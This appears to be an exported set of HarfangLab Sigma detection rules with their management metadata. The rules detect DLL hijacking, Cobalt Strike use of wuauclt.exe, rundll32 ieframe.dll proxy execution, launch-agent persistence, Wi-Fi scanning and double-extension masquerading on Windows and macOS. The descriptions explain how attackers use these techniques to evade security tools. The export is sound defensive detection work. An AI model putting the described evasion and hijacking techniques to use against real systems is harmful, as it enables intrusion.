"content": "title: DLL Hijacking via adobe_licensing_wf_helper.exe\nid: 07ddc2b1-4842-43eb-92d7-df872335fcf9\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'adobe_licensing_wf_helper.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith: '\\libcef.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
"rule_name": "DLL Hijacking via adobe_licensing_wf_helper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "081076fd-302d-429b-88c3-9339633fee72",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070904Z",
"creation_date": "2026-03-23T11:45:34.070906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070910Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_process_wuauclt.yml",
"content": "title: Suspicious wuauclt.exe Execution\nid: 081076fd-302d-429b-88c3-9339633fee72\ndescription: |\n Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\n This can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\n It is recommended to analyze the newly created process and its parents for suspicious behavior or content.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_existing_parent:\n ParentImage|contains: '\\'\n\n filter_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n filter_parentcommandline:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n - '?:\\Windows\\system32\\svchost.exe -k wuausvcs'\n - '?:\\Windows\\system32\\svchost.exe -k bitfsvcs'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_command:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\explorer.exe'\n\n exclusion_sihost1:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine:\n - '?:\\windows\\System32\\svchost.exe -k netsvcs'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -s UserManager'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_sihost2:\n Ancestors|contains: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\sihost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "081076fd-302d-429b-88c3-9339633fee72",
"rule_name": "Suspicious wuauclt.exe Execution",
"rule_description": "Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\nThis can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\nIt is recommended to analyze the newly created process and its parents for suspicious behavior or content.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093364Z",
"creation_date": "2026-03-23T11:45:34.093366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093370Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_001_launch_agents_created_plistbuddy.yml",
"content": "title: Launch Agent/Daemon Created via PlistBuddy\nid: 08393432-4fef-4e8b-aa5e-fc13131e09c3\ndescription: |\n Detects the creation of a launch agent or daemon using PlistBuddy.\n Adversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Tool.PlistBuddy\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage|endswith: '/PlistBuddy'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
"rule_name": "Launch Agent/Daemon Created via PlistBuddy",
"rule_description": "Detects the creation of a launch agent or daemon using PlistBuddy.\nAdversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069400Z",
"creation_date": "2026-03-23T11:45:34.069403Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Ieframe/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_ieframe_proxy_execution.yml",
"content": "title: Proxy Execution via ieframe.dll\nid: 0850e834-f366-4ebb-a022-79bc7b74fc1a\ndescription: |\n Detects a suspicious invocation of ieframe.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Ieframe/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ieframe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_ieframe:\n ParentCommandLine|contains:\n - ' ieframe,'\n - ' ieframe.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'OpenURL'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
"rule_name": "Proxy Execution via ieframe.dll",
"rule_description": "Detects a suspicious invocation of ieframe.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589223Z",
"creation_date": "2026-03-23T11:45:34.589227Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589234Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sihclient.yml",
"content": "title: DLL Hijacking via sihclient.exe\nid: 085b257b-644f-4cc1-bc25-578447cf5bf2\ndescription: |\n Detects potential Windows DLL Hijacking via sihclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\dnsapi.dll'\n - '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
"rule_name": "DLL Hijacking via sihclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sihclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598454Z",
"creation_date": "2026-03-23T11:45:34.598457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598465Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1595/"
],
"name": "t1595_wifi_scanning_airport_macos.yml",
"content": "title: Wi-Fi Networks Scanned via airport\nid: 0882e820-0755-4f74-94e4-b9ae77d3294d\ndescription: |\n Detects the execution of the airport command to scan nearby Wi-Fi networks.\n Attackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1595/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|contains: '/airport'\n CommandLine|contains: ' -s'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
"rule_name": "Wi-Fi Networks Scanned via airport",
"rule_description": "Detects the execution of the airport command to scan nearby Wi-Fi networks.\nAttackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081044Z",
"creation_date": "2026-03-23T11:45:34.081047Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081051Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/007/"
],
"name": "t1036_007_executable_with_multiple_extension.yml",
"content": "title: PE with Multiple Extensions Executed\nid: 08c82317-1fb0-42b6-b3cc-cf85ace1deb8\ndescription: |\n Detects the execution of a suspicious executable with multiple extensions.\n Attackers can add multiple extensions to an executable file to lure users into double clicking on the file.\n Since Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\n It is recommended to analyze the executed file to determine whether its execution is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/007/\ndate: 2021/03/30\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '(?i)\\.(?:xlsx?|pptx?|docx?|pdf|zip|rar|7z|png|jpe?g|bmp|gif|psd|tiff)\\s{0,4}\\.exe$'\n\n exclusion_ranorex:\n Image|endswith: '\\Ranorex.PDF.exe'\n OriginalFileName: 'Ranorex.PDF.exe'\n InternalName: 'Ranorex.PDF.exe'\n\n exclusion_portablegit:\n Image|endswith: '\\PortableGit-*.7z.exe'\n Signature: 'Johannes Schindelin'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
"rule_name": "PE with Multiple Extensions Executed",
"rule_description": "Detects the execution of a suspicious executable with multiple extensions.\nAttackers can add multiple extensions to an executable file to lure users into double clicking on the file.\nSince Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\nIt is recommended to analyze the executed file to determine whether its execution is legitimate.\n",
"rule_creation_date": "2021-03-30",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.007",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628428Z",
"creation_date": "2026-03-23T11:45:34.628430Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628434Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1204_002_shared_folder_execution.yml",
"content": "title: File Executed from Users Shared Folder\nid: 08ddafaf-401d-4c3d-9389-e96925e90f0f\ndescription: |\n Detects the execution of a file from the Users shared folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|startswith: '/Users/shared/'\n GrandparentImage|contains: '?'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_relocated:\n Image|startswith: '/Users/Shared/Relocated Items/Security/Applications/'\n GrandparentImage:\n - '/sbin/launchd'\n - '/Users/Shared/Relocated Items/Security/Applications/*'\n\n exclusion_gimp:\n ProcessGrandparentImage: '/Users/Shared/Previously Relocated Items/Security/GIMP.app/Contents/MacOS/GIMP-bin'\n # todo: add signature\n\n exclusion_logioption:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.logi.optionsplus.*'\n\n exclusion_hotreload:\n ProcessGrandparentImage:\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/MacOS/HotReload'\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/Resources/CodePatcherCLI'\n # todo: add signature\n\n exclusion_riotgames:\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (Renderer).app/Contents/MacOS/Riot Client Helper (Renderer)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (GPU).app/Contents/MacOS/Riot Client Helper (GPU)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper.app/Contents/MacOS/Riot Client Helper'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Helpers/chrome_crashpad_handler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - Image: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientCrashHandler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/macos/riot client'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/frameworks/riot client helper (renderer).app/contents/macos/riot client helper (renderer)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.riotgames.RiotGames.*'\n\n exclusion_lghub:\n - ParentImage: 